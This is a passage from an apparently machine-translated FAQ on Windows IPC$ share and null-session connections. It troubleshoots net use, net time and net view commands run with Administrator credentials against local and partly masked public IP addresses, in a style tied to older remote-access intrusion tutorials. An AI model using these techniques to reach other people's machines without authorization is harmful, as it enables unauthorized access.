14. I used net use \\192.168.0.2\ipc$ "password" /user:"Administrator" successfully, but net use I: \\192.168.0.2\c
prompts "please type the password for \\192.168.0.2". What is going on? I am using the administrator, so shouldn't I have access to everything?
A: Although you have administrator rights, the administrator may have set the sharing permissions of the C drive (note: an ordinary share can have access permissions set, while the default shares cannot) so that the administrator is not allowed access, which is why this happens.
15. If my machine prohibits ipc$, can I still use ipc$ to connect to other machines? What if the Server service is disabled?
A: With either of those disabled you can still initiate ipc$ connections; it is just that testing against yourself becomes harder.
16. Can you tell me the reason for the following two errors?
C:\>net Time \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
C:\>net View \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
A: When I first encountered this problem I was also very puzzled. Error 5 means insufficient permissions, but the permissions of a null session are enough for the two commands above, so why couldn't he run them? Had he not established the connection? Then the careless comrade told me what had happened: he had forgotten that he had already deleted the ipc$ connection, and then entered the two commands above, so error 5 occurred.
17. Can you see what is going on here?
F:\>net time
The time server could not be found.
Please type NET helpmsg 3912 for a lot of other help.
A: The answer is very simple: your command is wrong. It should be net time \\ip.
No IP address was entered, so the server could not be found. The view command also needs an IP address, i.e. net view \\ip.
